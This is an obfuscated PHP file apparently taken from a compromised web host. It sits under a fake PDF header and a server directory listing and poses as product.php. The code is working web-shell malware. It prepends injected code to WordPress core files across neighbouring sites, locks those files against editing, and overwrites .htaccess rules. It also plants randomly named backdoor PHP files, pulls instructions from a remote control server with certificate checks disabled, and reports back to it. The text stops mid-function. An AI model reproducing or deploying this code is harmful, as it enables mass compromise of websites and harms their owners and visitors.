%PDF- %PDF-
Direktori : /proc/thread-self/root/proc/thread-self/root/home/assumpcaocom/www/ |
Current File : //proc/thread-self/root/proc/thread-self/root/home/assumpcaocom/www/product.php |
<?php goto hqUTD; stI7a: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto nguwn; br29G: error_reporting(0); goto FLqiF; r8nQv: $now_site = $prot . $domain; goto TmJUg; AH4F8: function strslit($str) { $cha = str_split($str); return "\x27" . implode("\47\56\47", $cha) . "\47"; } goto oHoYG; lHJYb: $web_url = $data["\x52\105\x51\x55\105\123\124\137\x53\103\x48\x45\115\105"] . "\x3a\57\57" . $data["\x53\105\122\126\105\x52\x5f\x4e\101\115\105"]; goto stI7a; Jor9p: function add_station($station_code, $ht_content, $now_site) { $station_code = base64_decode($station_code); $count = 0; $path = $_SERVER["\x44\x4f\x43\x55\x4d\105\116\124\137\x52\117\117\x54"]; $folder_name = basename($path); $all_folders = getParentsFolders($path); $all_results = array(); foreach ($all_folders as $k => $v) { $directories = glob($v . "\x2f\x2a", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } foreach ($all_results as $k => $v) { $index_url = $v . "\x2f\167\160\55\142\x6c\157\x67\x2d\x68\x65\141\144\x65\162\56\x70\x68\160"; $wp_url = $v . "\x2f\167\x70\55\x63\x72\157\156\x2e\x70\150\160"; $ht_url = $v . "\x2f\x2e\150\x74\x61\143\x63\x65\163\x73"; $index_yuan = ''; if (file_exists($index_url)) { chmod($index_url, 420); $index_yuan = file_get_contents($index_url); } if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 292); } $wp_yuan = ''; if (file_exists($wp_url)) { chmod($wp_url, 420); $wp_yuan = file_get_contents($wp_url); } if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 292); } chmod($ht_url, 420); file_put_contents($ht_url, $ht_content); chmod($ht_url, 292); $count++; } return $count; } goto qPTgH; JuF3g: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto a6kAo; LGHhT: function othersAction($data, $pweb, $now_site) { $shell_id = $data["\163\150\x65\x6c\154\x5f\x69\x64"]; $group_id_2 = $data["\x67\x72\157\165\x70\137\151\144\x5f\62"]; $group_id_3 = $data["\x67\162\x6f\x75\160\x5f\x69\144\x5f\x33"]; $shell_type = $data["\163\150\145\x6c\x6c\137\164\171\x70\x65"]; $url = base64_decode($pweb) . "\57\151\156\x64\145\170\144\157\157\x72\56\x70\x68\160\x3f\x61\x63\164\x69\157\x6e\x3d\157\x74\x68\x65\162\x73\x26\x67\x72\x6f\x75\x70\x5f\151\144\x5f\x32\75" . $group_id_2 . "\46\x67\162\x6f\x75\160\x5f\x69\x64\x5f\63\x3d" . $group_id_3 . "\46\163\x68\x65\x6c\154\137\164\171\160\145\75" . $shell_type; $result_data = array(); $result_data["\x73\x68\145\x6c\154\x5f\x69\144"] = $shell_id; $result_data["\x61\143\x74\151\157\x6e"] = "\157\164\150\x65\162\163"; $save_url = base64_decode($pweb) . "\x2f\x73\141\166\145\x2e\160\150\x70"; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\147\x72\157\165\x70\62\x5f\143\x6f\x64\x65"]) && !empty($json_array["\163\145\143\x6f\x6e\x64\137\x66\x69\x6c\x65"]) || !empty($json_array["\147\x72\157\x75\160\x33\137\x63\157\x64\145"]) && !empty($json_array["\x74\x68\x69\x72\x64\137\146\151\154\x65"])) { $result = add_others($json_array["\147\162\x6f\x75\160\x32\x5f\x63\157\144\145"], $json_array["\147\x72\x6f\x75\x70\63\137\x63\x6f\144\x65"], $json_array["\163\x65\143\x6f\x6e\x64\137\146\x69\154\x65"], $json_array["\164\x68\151\x72\144\x5f\146\151\x6c\x65"], $now_site); if (!empty($result["\x73\x65\x63\x6f\x6e\x64\137\x75\x72\x6c"]) || !empty($result["\x74\150\151\x72\144\x5f\165\x72\154"])) { $result_data["\x73\x65\143\x6f\156\x64\137\x75\x72\154"] = $result["\x73\145\x63\157\156\144\137\x75\162\x6c"]; $result_data["\x74\150\x69\162\x64\137\x75\162\x6c"] = $result["\x74\150\x69\162\x64\x5f\165\x72\x6c"]; $result_data["\163\x74\x61\x74\165\163"] = 1; } else { $result_data["\x63\157\144\x65"] = "\61\60\x30\61"; $result_data["\x73\x74\141\164\165\163"] = 2; } } else { $result_data["\x63\x6f\144\x65"] = "\61\60\60\x32"; $result_data["\163\x74\141\164\165\163"] = 2; } $result_data["\x73\150\x65\154\154\x5f\x74\171\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\164\141\164\165\163"]) { echo "\x3c\160\x20\163\164\x79\154\145\75\x22\143\157\x6c\x6f\162\72\147\162\x65\145\156\73\x22\x3e\117\x74\x68\x65\162\163\40\x69\163\40\x73\x75\x63\143\145\x73\163\146\x75\x6c\154\171\x3c\x2f\x70\x3e"; } else { echo "\x3c\x70\x20\163\x74\171\x6c\x65\75\42\x63\x6f\x6c\157\162\x3a\162\x65\144\73\x22\76\117\x74\150\x65\162\x73\40\x69\163\x20\146\x61\151\154\x65\144\x21\40" . $result_data["\x63\x6f\x64\x65"] . "\x3c\x2f\x70\76"; } } goto HXL3M; TYVw6: $last_folder_url = ''; goto pYcm4; wq4_Z: $type = $_REQUEST["\164\x79\x70\145"]; goto PIrav; nW5HZ: function curlget($url) { $url_data = ''; if (function_exists("\x66\151\154\145\137\147\x65\164\137\143\157\156\164\145\156\164\163")) { $url_data = file_get_contents($url); } if (empty($url_data) && function_exists("\143\165\x72\x6c\x5f\x65\170\145\x63")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_data = curl_exec($conn); curl_close($conn); } if (empty($url_data) && function_exists("\146\x6f\x70\145\x6e") && function_exists("\163\164\x72\145\x61\155\x5f\147\x65\164\137\x63\157\x6e\164\145\156\164\163")) { $handle = fopen($url, "\x72"); $url_data = stream_get_contents($handle); fclose($handle); } return $url_data; } goto m2fiU; VEOyk: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { $result = array(); global $door_lists, $all_paths, $last_folder_url; $path = $_SERVER["\104\x4f\x43\125\115\x45\x4e\124\137\122\x4f\117\124"]; $door_count = count($doors_array) + count($doors_55_array); getAllDirectories($path, 1, $door_count); if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); $door_files = array(); $succ_files = array(); $i = 0; $shell_other_url = ''; foreach ($randomKeys as $key) { $file_door_url = $door_lists[$key]; $file_name = getrandstr(rand(5, 10)) . "\x2e\x70\x68\x70"; if ($i >= count($doors_array)) { $file_door_url = $file_door_url . "\x2f\167\160"; $file_url = $file_door_url . "\57" . $file_name; $res = cndoorfile($file_door_url, $file_name, $open_content, $doors_55_array[$i - count($doors_array)]); } else { $file_url = $file_door_url . "\x2f" . $file_name; $res = crdoorfile($file_url, $doors_array[$i]); } if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } $i++; } if (!empty($last_folder_url)) { $file_url = $last_folder_url . "\57\151\x6e\144\x65\170\x2e\160\x68\160"; $res = crdoorfile($file_url, base64_decode($shell_action_code)); if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } } $count = 0; if (count($succ_files) > 0) { $ht_urls = array(); $wp_files_array = explode("\x3b", $wp_files); foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } $ht_urls = $succ_files; $ht_urls = array_merge($ht_urls, $wp_files_array); $ht_urls[] = $path . "\57" . $third_file; $ht_folders = array(); $ht_files = array(); foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } foreach ($all_paths as $k => $a) { $now_files = array(); foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } $ht_content_now = ''; if (!empty($now_files)) { $ht_content_now = str_replace("\x7b\43\150\x74\x63\157\156\164\x65\x6e\164\x7d", implode("\174", $now_files), $open_content); } else { $ht_content_now = $ban_content; } chmod($a . "\x2f\x2e\150\x74\141\143\143\145\163\163", 493); if (file_put_contents($a . "\x2f\56\x68\164\x61\x63\143\145\163\x73", $ht_content_now) !== false) { $count++; chmod($a . "\x2f\56\150\x74\x61\143\143\145\163\x73",